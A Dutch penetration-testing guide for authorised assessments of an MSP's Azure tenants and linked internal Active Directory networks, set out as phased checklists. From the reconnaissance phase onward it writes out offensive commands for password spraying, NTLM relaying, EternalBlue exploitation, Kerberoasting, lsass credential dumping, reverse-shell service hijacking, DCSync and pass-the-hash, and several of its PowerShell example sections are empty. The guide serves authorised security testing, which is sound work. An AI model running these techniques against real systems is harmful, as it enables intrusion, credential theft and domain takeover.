Pentest Versie 5+

  1. Lage-Impact Azure Control Plane Beoordeling: Gebruikt voornamelijk Azure PowerShell/MS Graph API's, focust op configuratiebeoordeling, permissieanalyse en het identificeren van potentiële kwetsbaarheden zonder actieve exploitatie. Minimale voetafdruk, laag detectierisico.

  2. Hoge-Impact Interne & Hybride Penetratietest: Omvat actief netwerk scannen, exploitatie van kwetsbaarheden, credential dumping, netwerk relay-aanvallen, persistentietechnieken gericht op interne AD en hosts, en pivoteren tussen Azure en interne omgevingen. Draagt AANZIENLIJK OPERATIONEEL RISICO, HOGE DETECTIEKANS, en vereist EXPLICIETE, GRANULAIRE AUTORISATIE in de RoE voor ELKE high-impact techniek.

Deze gids presenteert beide. De beslissing welke technieken te gebruiken hangt volledig af van de geautoriseerde scope, rules of engagement (RoE), risicotolerantie en het oordeel van de tester. Ga ervan uit dat high-impact acties GEDETECTEERD ZULLEN WORDEN.

Fase 0: Voorbereiding - Autorisatie, Scoping & Arsenal Setup

Doel: Creëer waterdichte juridische autorisatie, definieer een precieze scope die Azure tenants, subscriptions, gedelegeerde toegang, EN potentieel interne netwerken/IP-reeksen omvat. Breng het complexe MSP-Klant technische ecosysteem in kaart (inclusief hybride koppelingen). Bereid de Azure PowerShell-omgeving EN traditionele interne pentesting tools voor.

Stap 0.1: Autorisatie & Hyper-Scoping

  • [ ] Uitleg: Verkrijg ondertekende autorisaties van meerdere partijen (MSP en alle in-scope klanten). Definieer de precieze grenzen. Voor MSP's is dit complex vanwege multi-tenancy en gedeelde verantwoordelijkheid. Een gebrek aan duidelijke autorisatie is een juridisch mijnenveld.

  • [ ] Checklist & Voorbeelden:

    • [ ] Gesigneerde SoW/RoE van MSP.

      • Voorbeeld: Een PDF-document getiteld "Statement_of_Work_MSP_Azure_Pentest_Q3_2024.pdf" ondertekend door de CTO van de MSP.

    • [ ] Gesigneerde SoW/RoE addenda/bevestigingen van elke in-scope klant tenant eigenaar.

      • Voorbeeld: Aparte e-mailbevestigingen of ondertekende addenda van Klant A ("ClientA_Pentest_Authorization.pdf") en Klant B ("ClientB_Pentest_Consent.eml").

    • [ ] RoE vermeldt toegestane Tenant ID's, Subscription ID's, Lighthouse/GDAP Relatie ID's.

      • Voorbeeld: RoE Sectie 3.1: "Scope omvat MSP Tenant ID: abc...def, Klant A Tenant ID: 123...456, Klant A Subscription ID: sub-A-prod-..., Klant B Tenant ID: 789...abc, GDAP Relatie: MSP_ClientB_Support_Rel."

    • [ ] RoE specificeert toegestane Azure PowerShell cmdlets (vooral niet-Get-*).

      • Voorbeeld: RoE Appendix B: "Cmdlets beperkt tot Get-*, Resolve-*, Test-*. Expliciete goedkeuring vereist voor New-AzRoleAssignment, Set-AzKeyVaultSecret, Invoke-AzVMRunCommand."

    • [ ] [KRITIEKE SCOPE] RoE beschrijft expliciet toegestane interne scope: IP-reeksen, specifieke uitgesloten systemen.

      • Voorbeeld: RoE Sectie 3.2: "Interne scope beperkt tot 192.168.10.0/24 (Kantoor Klant A) en 10.50.0.0/16 (MSP Management VLAN). Uitgesloten: 192.168.10.250 (Gebouwbeheersysteem)."

    • [ ] [KRITIEKE SCOPE] RoE keurt expliciet elke categorie van HIGH-IMPACT technieken goed.

      • Voorbeeld: RoE Appendix C: "Goedgekeurde High-Impact Technieken: Actief Netwerk Scannen (nmap -sV) op gescoopte reeksen; Netwerk Relay Aanvallen (Responder/ntlmrelayx) alleen op 10.50.0.0/16; Credential Dumping (Mimikatz lsadump::sam, sekurlsa::logonpasswords) geautoriseerd alleen op door tester ingezette VM's; Geen actieve exploitatie van kwetsbaarheden toegestaan."

    • [ ] RoE definieert communicatiekanalen, escalatiepunten, testvensters en incidentafhandelingsprocedures.

      • Voorbeeld: RoE Sectie 5: "Primair Contact: [email protected]. Escalatie: Jane Doe (MSP Security Lead). Testvenster: Ma-Vr 22:00 - 06:00 Lokale Tijd. Incident gedetecteerd? Stop activiteit, neem onmiddellijk contact op met Primair Contact."

  • Azure PowerShell Voorbeeld (Conceptueel - Geen directe code voor autorisatie): N.v.t. - Juridische/Contractuele stap.

Stap 0.2: MSP Ecosysteem Diepgaande Analyse (Hybride Focus)

  • [ ] Uitleg: Begrijp hoe de MSP klanten beheert (Lighthouse, GDAP, custom scripts?), de Azure AD structuur, en cruciaal, hoe Azure integreert met interne netwerken (AAD Connect, VPN/ER, Arc, Hybrid Workers). Deze context is vitaal voor het identificeren van pivot-punten.

  • [ ] Checklist & Voorbeelden:

    • [ ] Beoordeel MSP's Azure Tenant: Lighthouse Definities, RBAC-rollen, PIM-beleid.

      • Voorbeeld: Uitvoeren van Get-AzManagedServicesDefinition in MSP tenant toont een aanbod genaamd "Gold_Client_Support" dat de "Contributor" rol en een custom "BackupOperator" rol delegeert. PIM-beleid vereist MFA voor activering van de "MSP Global Admins" rol.

    • [ ] Begrijp GDAP rol-mapping naar AAD-groepen binnen MSP tenant.

      • Voorbeeld: Interviewnotities geven aan dat GDAP-rol "Helpdesk Agent" voor Klant B is toegewezen aan de AAD-groep "MSP_Tier1_Support_ClientB" in de MSP tenant.

    • [ ] Documenteer bekende hybride connecties: AAD Connect server locatie/topologie, ADFS details, VPN/ER gateway IPs/subnets, Arc-enabled server doeleinden, Hybrid Worker locaties.

      • Voorbeeld: Een diagram toont AADConnect01.internal.corp (IP: 10.50.1.10) die synchroniseert naar Azure. VPN Gateway Public IP is 20.x.y.z, verbindt met interne reeks 10.50.0.0/16. Drie Arc-servers getagged "Patching Target" bestaan in Klant A's sub.

    • [ ] Documenteer interne AD-structuur basics (domeinen, trusts) indien informatie beschikbaar is.

      • Voorbeeld: MSP gebruikt internal.corp domein. Klant A gebruikt clientA.local. Geen trust gedocumenteerd tussen hen.

  • Azure PowerShell Voorbeeld (MSP Tenant Context - Read Only):

Stap 0.3: PowerShell & Pentest Arsenaal Voorbereiding

  • [ ] Uitleg: Zorg ervoor dat uw testmachine beschikt over de benodigde Azure PowerShell-modules EN een volledige suite van interne netwerk pentesting tools (typisch via een dedicated VM zoals Kali Linux).

  • [ ] Checklist & Voorbeelden (Azure Tools):

    • [ ] Verifieer/Update Az Module.

      • Voorbeeld: Get-Module Az -ListAvailable toont versie 9.x.x geïnstalleerd. Indien ouder, voer Update-Module Az -Force uit.

    • [ ] Verifieer/Installeer Microsoft.Graph SDK Modules.

      • Voorbeeld: Het uitvoeren van het checkscript uit Fase 0 bevestigt dat Microsoft.Graph.Authentication, Identity.DirectoryManagement, etc., aanwezig zijn. Zo niet, voer Install-Module Microsoft.Graph.Identity.DirectoryManagement -Scope CurrentUser -Force uit.

    • [ ] Controleer PowerShell ExecutionPolicy.

      • Voorbeeld: Get-ExecutionPolicy -Scope CurrentUser retourneert RemoteSigned. Indien Restricted, voer Set-ExecutionPolicy RemoteSigned -Scope CurrentUser -Force uit.

    • [ ] Optionele Get-AzTenant connectiviteitscheck.

      • Voorbeeld: Get-AzTenant -DomainName mspcompany.com retourneert succesvol de Tenant ID, wat basisconnectiviteit en DNS-resolutie voor Azure endpoints bevestigt.

    • [ ] Optioneel laden van helper scripts/profielen.

      • Voorbeeld: . .\MyCommonFunctions.ps1 laadt custom functies zoals Export-CsvLog van een lokaal hulpprogrammascript.

  • [ ] Checklist & Voorbeelden (Interne Tools - Aangenomen op aparte Kali/Pentest VM):

    • [ ] Nmap

      • Voorbeeld: nmap --version toont Nmap 7.9x geïnstalleerd.

    • [ ] Enum4linux-ng, Impacket Suite

      • Voorbeeld: enum4linux-ng -h en psexec.py -h tonen helpmenu's, wat installatie bevestigt.

    • [ ] Metasploit Framework

      • Voorbeeld: msfconsole -v toont Metasploit Framework 6.x beschikbaar.

    • [ ] Responder, ntlmrelayx.py

      • Voorbeeld: sudo responder -h en ntlmrelayx.py -h tonen gebruiksopties.

    • [ ] Hydra, CrackMapExec, Hashcat/John

      • Voorbeeld: hydra -h, crackmapexec --help, hashcat -h bevestigen dat tools in PATH staan.

    • [ ] Mimikatz, Procdump

      • Voorbeeld: mimikatz.exe (op een Windows VM/implant) start; procdump.exe gebruik is bekend.

    • [ ] BloodHound/SharpHound, WinPEAS/LinPEAS

      • Voorbeeld: BloodHound GUI geïnstalleerd; SharpHound.ps1 of SharpHound.exe beschikbaar; WinPEAS.bat/linpeas.sh gedownload.

    • [ ] Chisel, ligolo-ng, SSH

      • Voorbeeld: chisel -h, ligolo-ng -h, ssh -V tonen dat tools klaar zijn voor pivoting/tunneling.

  • Azure PowerShell Voorbeeld (Omgevingssetup):

Fase 1: Uitgebreide Reconnaissance (Azure, Intern, OSINT)

Doel: Ontdek de publieke voetafdruk van de MSP en mogelijk klanten (domeinen, IP's, cloud services), identificeer Tenant ID's, breng het externe aanvalsoppervlak in kaart, en voer initiële geautoriseerde interne netwerk discovery uit indien binnen scope. Combineer OSINT, low-impact Azure probes, en potentieel higher-impact interne scans.

Stap 1.1: [LAGE-IMPACT AZURE/OSINT] Externe Footprinting

  • [ ] Uitleg: Identificeer domeinen, subdomeinen, geassocieerde Tenant ID's, en publiek blootgestelde Azure-services met behulp van niet-intrusieve methoden.

  • [ ] Checklist & Voorbeelden:

    • [ ] Gebruik OSINT tools/websites voor domeinen, IP's, tech stack.

      • Voorbeeld: Zoeken op dnsdumpster.com naar mspcompany.com onthult subdomeinen zoals portal.mspcompany.com en vpn.mspcompany.com die naar specifieke IP-adressen wijzen. Shodan zoekopdracht voor IP's toont IIS draaiend.

    • [ ] Resolveer bekende MSP/klant domeinen naar Tenant ID's.

      • Voorbeeld:

        retourneert Tenant ID 123...456.

    • [ ] Analyseer OIDC endpoints voor Tenant details.

      • Voorbeeld:

        toont de issuer URL die de tenant ID 123...456 bevestigt.

    • [ ] Voer uitgebreide DNS enumeratie uit (A, CNAME, TXT).

      • Voorbeeld:

    • [ ] Raad en probeer publieke Azure Storage accounts.

      • Voorbeeld:

  • Azure PowerShell Voorbeeld: (Zie Voorbeelden hierboven binnen Checklist).

Stap 1.2: [LAGE-IMPACT AZURE/OSINT] Initieel Service Onderzoek (Optioneel - RoE Afhankelijk)

  • [ ] Uitleg: Controleer voorzichtig of veelvoorkomende poorten open zijn op ontdekte publieke IP's. Controleer RoE nauwgezet alvorens in te schakelen.

  • [ ] Checklist & Voorbeelden:

    • [ ] [RoE Check] Indien toegestaan, voer voorzichtige TCP poortscans uit op ontdekte publieke IP's.

      • Voorbeeld (Conceptuele PowerShell):

    • [ ] [RoE Check] Indien toegestaan, probeer banner grabbing op open poorten.

      • Voorbeeld: Handmatig verbinden nc 20.x.y.z 443 en garbage sturen kan een SSL-certificaat of webserverbanner onthullen. Vereist RoE.

    • [ ] [RoE Check] Indien specifieke IP's vermoedelijk Azure VM's zijn en RoE directe verbindingspogingen toestaat, probeer Azure Instance Metadata service check.

      • Voorbeeld:

        Succes (JSON terugkrijgen) impliceert sterk een Azure VM. Vereist specifieke RoE.

  • Azure PowerShell Voorbeeld: (Zie PowerShell script voorbeeld in vorige antwoord / Gentle Port Check voorbeeld hierboven).

Stap 1.3: [HOGE-IMPACT INTERN] Initieel Intern Netwerk Recon (Vereist Interne Scope & RoE)

  • [ ] Uitleg: Indien intern gepivoteerd of startend binnen een geautoriseerd intern netwerksegment, begin met het in kaart brengen van de lokale omgeving. Genereert detecteerbaar netwerkverkeer.

  • [ ] Checklist & Voorbeelden:

    • [ ] [RoE Check] Identificeer eigen interne IP, subnetmasker, gateway, DNS-servers.

      • Voorbeeld: Op Kali VM (aangenomen pivot punt): ip a toont IP 10.50.1.100/16, gateway 10.50.0.1. cat /etc/resolv.conf toont DNS server 10.50.0.5.

    • [ ] [RoE Check] [DETECTIE RISICO] Voer netwerk host discovery uit op toegestane segmenten.

      • Voorbeeld: sudo nmap -sn 10.50.1.0/24 lijst 15 hosts op die reageren op pings/ARP binnen die /24.

    • [ ] [RoE Check] [DETECTIE RISICO] Voer initiële, beperkte poortscans uit op ontdekte live hosts.

      • Voorbeeld: sudo nmap -T4 --top-ports 1000 10.50.1.10 10.50.1.15 toont host .10 heeft 88 (Kerberos), 389 (LDAP), 445 (SMB) open. Host .15 heeft 80, 443 open.

    • [ ] [RoE Check] Probeer basis anonieme/null-sessie enumeratie.

      • Voorbeeld: smbclient -N -L \\\\10.50.1.10 lijst shares zoals IPC$, NETLOGON, SYSVOL. ldapsearch -x -h 10.50.1.10 -b "" -s base namingContexts retourneert DC=internal,DC=corp.

  • Azure PowerShell Voorbeeld (Informatief):

Fase 2: Geauthenticeerde Enumeratie & Kwetsbaarheidsanalyse (Azure & Intern)

Doel: Maak gebruik van geautoriseerde credentials voor diepgaande exploratie van Azure en intern AD/netwerk. Identificeer misconfiguraties, kwetsbaarheden, vertrouwensrelaties en potentiële pivot-punten.

Stap 2.1: [LAGE-IMPACT AZURE] Azure Geauthenticeerde Diepe Enumeratie

  • [ ] Uitleg: Gebruik verkregen Azure credentials om Azure AD, RBAC, resources en delegatie mechanismen uitgebreid in kaart te brengen over alle toegankelijke scopes.

  • [ ] Checklist & Voorbeelden (Voer relevante secties uit per Tenant/Subscription Context):

    • [ ] Context Validatie: Verifieer connectie, lijst toegankelijke Subscriptions.

      • Voorbeeld:

    • [ ] Delegatie Mapping: Enumereer Lighthouse, GDAP.

      • Voorbeeld:

    • [ ] AAD Objecten:

      • [ ] Gebruikers (Get-AzADUser): Controleer types, enabled status, sync status, gasten, admin rollen.

        • Voorbeeld:

      • [ ] Groepen (Get-AzADGroup): Controleer security/role-assignable status, owners, leden, sync status, groepgebruik in delegaties.

        • Voorbeeld:

      • [ ] Service Principals (Get-AzADServicePrincipal): Controleer credentials, owners, types, toegekende permissies.

        • Voorbeeld:

      • [ ] Applicaties (Get-AzADApplication): Controleer multi-tenant status, owners, reply URLs, gevraagde permissies.

        • Voorbeeld:

    • [ ] Azure RBAC:

      • [ ] Toewijzingen (Get-AzRoleAssignment -IncludeClassicAdministrators): Map rollen, identificeer gasten, noteer geprivilegieerde rollen.

        • Voorbeeld:

      • [ ] Custom Rollen (Get-AzRoleDefinition -Custom): Analyseer acties voor gevaarlijke permissies.

        • Voorbeeld:

      • [ ] Klassieke Admins (Get-AzClassicAdministrator).

        • Voorbeeld:

    • [ ] Azure Resources (Per Subscription): Enumereer uitgebreid, noteer hybride componenten.

      • Voorbeeld:

    • [ ] Resource Graph Queries: Gebruik Search-AzGraph voor brede configuratiechecks.

      • Voorbeeld:

  • Azure PowerShell Voorbeeld: (Zie Checklist Voorbeelden hierboven & Fase 2 Script Voorbeelden in vorige antwoord).

Stap 2.2: [HOGE-IMPACT INTERN] Interne Diepe Enumeratie & Kwetsbaarheidsscanning (Vereist Interne Scope/Creds & RoE)

  • [ ] Uitleg: Indien interne toegang/credentials verkregen zijn, voer diepe enumeratie van Active Directory en netwerkservices uit. Identificeer misconfiguraties en kwetsbaarheden met actieve scanning en gespecialiseerde tools. Deze acties zijn luidruchtig en vereisen specifieke autorisatie.

  • [ ] Checklist & Voorbeelden:

    • [ ] [RoE Check] [DETECTIE RISICO] Gedetailleerde Service Scanning.

      • Voorbeeld: sudo nmap -sV -sC -p 135,139,445,3389 10.50.1.10 toont SMBv1 enabled (potentiële kwetsbaarheid) en identificeert exacte Windows Server versie. -p- voor alle poorten is veel langzamer/luidruchtiger.

    • [ ] [RoE Check] [DETECTIE RISICO] Diepe AD Enumeratie:

      • [ ] BloodHound/SharpHound dataverzameling & Analyse.

        • Voorbeeld: Uitvoeren SharpHound.exe -c All op een joined machine genereert ZIP-bestanden. Importeren in BloodHound GUI onthult gebruiker j.doe is lid van groep LocalAdmins_Tier0 die GenericAll rechten heeft op het Domein object -> pad naar DA.

      • [ ] Gebruik PowerView/SharpView of Impacket voor details.

        • Voorbeeld: Van joined machine (of via psexec): powershell -exec bypass -c "Import-Module .\PowerView.ps1; Get-NetUser -AdminCount | Select SamAccountName" lijst geprivilegieerde gebruikers op. Impacket: lookupsid.py internal.corp/[email protected] resolveert de SID.

      • [ ] Identificeer Kerberoastable gebruikers.

        • Voorbeeld: GetUserSPNs.py internal.corp/pentester:Password123! -dc-ip 10.50.1.10 -request retourneert TGS hashes voor service accounts zoals svc_sql.

      • [ ] Identificeer AS-REP Roastable gebruikers.

        • Voorbeeld: GetNPUsers.py internal.corp/ -dc-ip 10.50.1.10 -request -format hashcat -outputfile asrep_hashes.txt vindt gebruikers met "Do not require Kerberos preauthentication" ingesteld en slaat hun TGT hashes op.

      • [ ] Controleer SYSVOL op GPP wachtwoorden of gevoelige bestanden.

        • Voorbeeld: Browsen \\\\internal.corp\SYSVOL\internal.corp\Policies\{GUID}\MACHINE\Preferences\ScheduledTasks\ScheduledTasks.xml onthult credentials opgeslagen voor een geplande taak. Gebruik gpp-decrypt op de cpassword.

    • [ ] [RoE Check] Netwerk Share Diepgaande Analyse: Authenticeer op shares (indien creds bekend), lijst recursief bestanden op, controleer permissies, grep naar gevoelige info (wachtwoorden, sleutels, connectiestrings).

      • Voorbeeld: crackmapexec smb 10.50.1.0/24 -u '' -p '' --shares toont READ toegang tot \\10.50.1.50\IT_Scripts. Browsen onthult deploy_azure.ps1 dat hardcoded SP credentials bevat.

    • [ ] [RoE Check] Enumereer andere interne services geïdentificeerd (databases - check default creds, interne web apps - dirbusting/vuln scan).

      • Voorbeeld: Verbind met MSSQL service gevonden op 10.50.1.20 met default sa/Password123 (indien toegestaan door RoE) -> succes. Voer nmap --script http-enum <internal_web_ip> uit en ontdekt /backup/ directory.

  • Azure PowerShell Voorbeeld (Informatief):

Stap 2.3: [HYBRIDE PIVOT] Kwetsbaarheidsanalyse & Correlatie

  • [ ] Uitleg: Synthetiseer bevindingen van zowel Azure als interne enumeratie om cross-environment zwakheden te identificeren.

  • [ ] Checklist & Voorbeelden:

    • [ ] Breng Azure misconfiguraties in kaart.

      • Voorbeeld: Owner rol toegewezen aan MSP_Backup_App SP geïdentificeerd. Storage account msplogs staat publieke blob toegang toe.

    • [ ] Breng interne misconfiguraties in kaart.

      • Voorbeeld: Gebruiker svc_sql is Kerberoastable gevonden. SMB Signing uitgeschakeld op server APP01. GPO verspreidt lokaal admin wachtwoord via GPP.

    • [ ] Correlatie:

      • Voorbeeld: Azure VM ClientA-Web01 is Arc-enabled. Gebruiker clientA\backup_svc heeft Azure Contributor RBAC op deze Arc resource. Indien clientA\backup_svc intern gecompromitteerd wordt, kan Invoke-AzVMRunCommand gebruikt worden om als SYSTEM uit te voeren op ClientA-Web01.

      • Voorbeeld: Gebruiker [email protected] synchroniseert naar Azure AD ([email protected]) en is Global Admin. Compromitteren van [email protected] intern geeft GA toegang.

      • Voorbeeld: Interne share \\filesrv\Public\AzureCreds.xlsx bevat plaintext Azure Storage keys.

    • [ ] Identificeer bekende CVE's.

      • Voorbeeld: Interne server WEBSERVER01 (IP 10.50.1.15) heeft Apache 2.4.49 volgens Nmap -sV. searchsploit apache 2.4.49 onthult CVE-2021-41773 (Path Traversal).

  • Azure PowerShell Voorbeeld (Controleer NSG Regels voor Specifieke Interne Reeks):

Fase 3: Foothold & Initiele Toegang (Uitbuiten van Zwakheden)

Doel: Verkrijg de eerste shell of ongeautoriseerde toegangssessie binnen de Azure-omgeving of het interne netwerk. Deze fase omvat actieve exploitatie en draagt significant risico.

Stap 3.1: [LAGE-IMPACT AZURE] / [HOGE-IMPACT AZURE] Azure Initiele Toegangspogingen

  • [ ] Uitleg: Probeer toegang te krijgen tot Azure met credentials, misconfiguraties, of applicatie kwetsbaarheden. Impact varieert.

  • [ ] Checklist & Voorbeelden:

    • [ ] [DETECTIE RISICO] Password Spray tegen AAD.

      • Voorbeeld: Met MSOLSpray tool: MSOLSpray -UserList users.txt -Password 'Summer2024!' -MaxThreads 5. Monitor op geblokkeerde accounts.

    • [ ] Gebruik gelekte/gevonden credentials.

      • Voorbeeld: Met credentials [email protected] / FoundPassword1 gevonden in interne recon:

        Login succesvol.

    • [ ] [RoE Check] [HOGE-IMPACT] Exploit kwetsbaarheden in Azure-hosted web applicaties.

      • Voorbeeld: Met Burp Suite tegen app.clientA.com gehost op Azure App Service, vind SQL injectie kwetsbaarheid in zoekparameter. Gebruik sqlmap om database content te dumpen (vereist web pentest skills & tools).

    • [ ] Maak misbruik van excessieve Gast permissies.

      • Voorbeeld: Inloggen als gecompromitteerde Gast gebruiker [email protected] toont dat ze onverwachte toegang hebben om gebruikers/groepen te enumereren via Azure portal/PowerShell (Get-AzADUser).

  • Azure PowerShell Voorbeeld (Loginpoging met Credentials):

Stap 3.2: [HOGE-IMPACT INTERN] Interne Initiele Toegangspogingen (Vereist Interne Scope & Expliciete RoE)

  • [ ] Uitleg: Exploit kwetsbaarheden of misconfiguraties binnen het interne netwerk om een foothold te verkrijgen. Hoge-impact en vereist specifieke autorisatie.

  • [ ] Checklist & Voorbeelden:

    • [ ] [RoE Check] [HOGE-IMPACT] [DETECTIE RISICO] Netwerk Poisoning & Relaying.

      • Voorbeeld: Draai sudo responder -I eth0 -wrf. Een gebruiker benadert \\nonexistent. Responder vangt Net-NTLMv2 hash. Draai sudo ntlmrelayx.py -t smb://10.50.1.50 -c "whoami". Indien SMB signing uitgeschakeld is op .50, voert commando succesvol uit.

    • [ ] [RoE Check] [HOGE-IMPACT] [DETECTIE RISICO] Exploit Bekende Kwetsbaarheden.

      • Voorbeeld: Target server 10.50.1.40 geïdentificeerd als kwetsbaar voor MS17-010. In msfconsole: use exploit/windows/smb/ms17_010_eternalblue; set RHOSTS 10.50.1.40; run. Meterpreter sessie verkregen.

    • [ ] [RoE Check] [HOGE-IMPACT] Kerberoasting / AS-REP Roasting.

      • Voorbeeld: Kraak Kerberoast hash voor svc_sql met hashcat -m 13100 hash.txt rockyou.txt. Gekraakt wachtwoord is SqlServicePa$$. Gebruik crackmapexec winrm 10.50.1.20 -u svc_sql -p 'SqlServicePa$$' -x whoami -> succesvolle uitvoering.

    • [ ] [RoE Check] [HOGE-IMPACT] [DETECTIE RISICO] Interne Password Spraying.

      • Voorbeeld: crackmapexec smb 10.50.1.0/24 -u usernames.txt -p 'Winter2023!' --continue-on-success vindt geldige credentials voor j.doe.

    • [ ] [RoE Check] Gebruik GPP Wachtwoorden gevonden in SYSVOL.

      • Voorbeeld: Decrypt GPP wachtwoord gevonden in XML-bestand voor gebruiker adm_local. Gebruik psexec.py internal.corp/[email protected] met het gedecrypteerde wachtwoord -> SYSTEM shell.

    • [ ] [RoE Check] Maak misbruik van zwakke share permissies.

      • Voorbeeld: Share \\10.50.1.50\Installers is world-writable. Upload nc.exe en een reverse shell batch script. Vind manier om uitvoering te triggeren.

  • Azure PowerShell Voorbeeld (Conceptueel - Trigger Run Command indien Azure Toegang Verkregen tot Hybride Machine):

Fase 4: Privileges Escalatie (Verticaal & Horizontaal)

Doel: Verhoog permissies vanaf de initiele foothold om hogere controle te krijgen binnen het gecompromitteerde systeem of omgeving (bv. Local Admin, Domain Admin, Azure Subscription Owner, Global Admin).

Stap 4.1: [LAGE-IMPACT AZURE] / [HOGE-IMPACT AZURE] Azure Privileges Escalatie

  • [ ] Uitleg: Gebruik permissies van het gecompromitteerde Azure principal of exploit Azure misconfiguraties om hogere RBAC of AAD rollen te verkrijgen.

  • [ ] Checklist & Voorbeelden:

    • [ ] Exploit RBAC:

      • [ ] Indien User Access Admin: Voeg zelf toe als Owner.

        • Voorbeeld:

      • [ ] Indien Contributor op Sub/RG: Exploit code executie permissies.

        • Voorbeeld: Als Contributor, deploy een ARM-template met New-AzResourceGroupDeployment die een Custom Script Extension op een VM uitvoert.

      • [ ] Indien Contributor op Automation Account: Wijzig Runbook.

        • Voorbeeld: Gebruik Set-AzAutomationRunbookContent om een Runbook script te vervangen.

    • [ ] Exploit AAD Permissies:

      • [ ] Indien SP Owner: Voeg nieuw secret toe.

        • Voorbeeld:

      • [ ] Indien Application Admin/Cloud App Admin: Geef illegale consent of voeg creds toe.

        • Voorbeeld: Gebruik Azure Portal/Graph API om hoge API permissies toe te voegen aan een gecontroleerde applicatie en geef admin consent.

      • [ ] Indien Privileged Role Admin/Global Admin: Wijs rollen toe aan zelf/anderen.

        • Voorbeeld (MSGraph):

    • [ ] Exploit Resource Permissies:

      • [ ] Indien Key Vault Secrets Officer/Write policy: Overschrijf secrets.

        • Voorbeeld:

      • [ ] Indien Storage Account Contributor/listKeys: Haal keys op.

        • Voorbeeld:

  • Azure PowerShell Voorbeeld (Voeg Zelf Toe als Owner indien User Access Admin):

Stap 4.2: [HOGE-IMPACT INTERN] Interne Privileges Escalatie (Vereist Interne Foothold & Expliciete RoE)

  • [ ] Uitleg: Verhoog privileges op de gecompromitteerde interne host en potentieel binnen het AD domein. Hoge-impact en waarschijnlijk gedetecteerd.

  • [ ] Checklist & Voorbeelden (Op Gecompromitteerde Interne Host):

    • [ ] [RoE Check] [HOGE-IMPACT] Lokale Enumeratie.

      • Voorbeeld: Uitvoeren WinPEAS.bat markeert een Unquoted Service Path voor "CrappyAppService". Service binary pad is schrijfbaar door Authenticated Users.

    • [ ] [RoE Check] [HOGE-IMPACT] [DETECTIE RISICO] Lokaal Credential Dumping.

      • Voorbeeld: Op Meterpreter sessie: load kiwi; creds_all. Mimikatz output toont NTLM hash voor ingelogde domeingebruiker j.smith. Draai procdump64.exe -accepteula -ma lsass.exe lsass.dmp, exfiltreer lsass.dmp, draai Mimikatz offline: sekurlsa::minidump lsass.dmp, sekurlsa::logonpasswords.

    • [ ] [RoE Check] [HOGE-IMPACT] Exploit Lokale Kwetsbaarheden.

      • Voorbeeld: Vervang C:\Program Files (x86)\Crappy App\CrappyAppService.exe (vanwege zwakke perms gevonden door accesschk) met reverse shell payload. Herstart service (sc stop CrappyAppService; sc start CrappyAppService) -> SYSTEM shell callback. Check kernel exploits zoals JuicyPotato/RottenPotato.

    • [ ] [RoE Check] [HOGE-IMPACT] [DETECTIE RISICO] Pass-the-Hash/Ticket.

      • Voorbeeld: Gebruik j.smith's NTLM hash verkregen via Mimikatz: psexec.py -hashes :<NT_HASH> internal.corp/[email protected] om SYSTEM shell te krijgen op DC01 (indien j.smith DA is).

    • [ ] [RoE Check] [HOGE-IMPACT] Domein Privileges Escalatie (Vereist foothold):

      • [ ] Gebruik BloodHound data: Identificeer kortste pad naar DA.

        • Voorbeeld: BloodHound toont huidige gebruiker kan schrijven naar GPO gelinkt aan Domain Controllers OU. Wijzig GPO om startup script uit te voeren dat gebruiker toevoegt aan DA groep. Wacht op GPUpdate of forceer (Invoke-GPUpdate).

      • [ ] Misbruik Unconstrained/Constrained Delegation.

        • Voorbeeld: Indien machine met Unconstrained Delegation gecompromitteerd is, forceer authenticatie van DC (bv. Printer Bug), steel DC's TGT uit geheugen met Mimikatz (sekurlsa::tickets /export), gebruik Pass-the-Ticket.

      • [ ] Misbruik ADCS (Certificate Templates).

        • Voorbeeld: Gebruik Certipy (certipy find ... -vulnerable) vindt kwetsbare ESC1 template. Vraag cert aan: certipy req ... -template VulnTemplate. Authenticeer met cert: certipy auth -pfx cert.pfx. Voer DCSync uit.

      • [ ] Gebruik secretsdump.py of dcsync indien geprivilegieerd account verkregen.

        • Voorbeeld: Na verkrijgen DA hash: secretsdump.py -hashes :<DA_NT_HASH> internal.corp/[email protected] om alle domein hashes te dumpen inclusief krbtgt.

  • Azure PowerShell Voorbeeld (Informatief):

Fase 5: Laterale Beweging & Missie Doelstellingen (Grenzen Overschrijden)

Doel: Verspreid toegang door de omgeving(en), beweeg tussen systemen en potentieel tussen Azure en het interne netwerk, om de uiteindelijke doelstellingen gedefinieerd in de RoE te bereiken.

Stap 5.1: [LAGE-IMPACT AZURE] / [HOGE-IMPACT AZURE] Azure Laterale Beweging

  • [ ] Uitleg: Gebruik verkregen privileges en Azure features om te bewegen tussen subscriptions, resource groups, en potentieel naar client tenants via delegatie.

  • [ ] Checklist & Voorbeelden:

    • [ ] Gebruik gecompromitteerde credentials/sessies: Krijg toegang tot resources toegestaan door RBAC.

      • Voorbeeld:

        wisselt context om te opereren in Sub B.

    • [ ] [HYBRIDE PIVOT] Pivot via Lighthouse/GDAP delegaties.

      • Voorbeeld: Gecompromitteerd MSP account zit in groep "MSP_Tier2_Support" die GDAP "Global Reader" toegang heeft tot Klant B. Verbind met MSP creds, gebruik dan Graph cmdlets gericht op Klant B's tenant ID:

    • [ ] Beweeg tussen VNets via Peering of Gateways.

      • Voorbeeld: Vanaf gecompromitteerde VM in VNet A (gepeerd met VNet B), gebruik Test-NetConnection <IP_in_VNet_B> -Port 3389. Succes indiceert open netwerkpad (afhankelijk van NSG regels).

    • [ ] Gebruik gestolen credentials/keys van KV of Storage om toegang te krijgen tot gelinkte resources.

      • Voorbeeld: Gebruik Storage Key gestolen uit Key Vault:

  • Azure PowerShell Voorbeeld (Wissel Subscription Context):

Stap 5.2: [HOGE-IMPACT INTERN] Interne Netwerk Laterale Beweging (Vereist Interne Foothold & Expliciete RoE)

  • [ ] Uitleg: Gebruik gecompromitteerde credentials/technieken om te bewegen tussen interne systemen.

  • [ ] Checklist & Voorbeelden:

    • [ ] [RoE Check] [HOGE-IMPACT] [DETECTIE RISICO] Pass-the-Hash/Ticket.

      • Voorbeeld: Vanaf Kali, met DA hash: wmiexec.py -hashes :<DA_NT_HASH> internal.corp/[email protected] "dir c:\sensitive_data".

    • [ ] [RoE Check] RDP/WinRM/SSH met gecompromitteerde credentials.

      • Voorbeeld: Gebruik xfreerdp /v:CLIENTPC05 /u:j.smith /p:<CrackedPassword> om te RDP'en naar ander werkstation. Gebruik Enter-PSSession -ComputerName SERVER02 -Credential $cred met verkregen credentials.

    • [ ] [RoE Check] Maak misbruik van local admin access sprawl.

      • Voorbeeld: Gedumpte hash voor lokale admin .\ladmin op PC1. Probeer psexec.py -hashes :<ladmin_NT_HASH> internal.corp/ladmin@PC2 -> Succes, zelfde lokaal admin wachtwoord gebruikt.

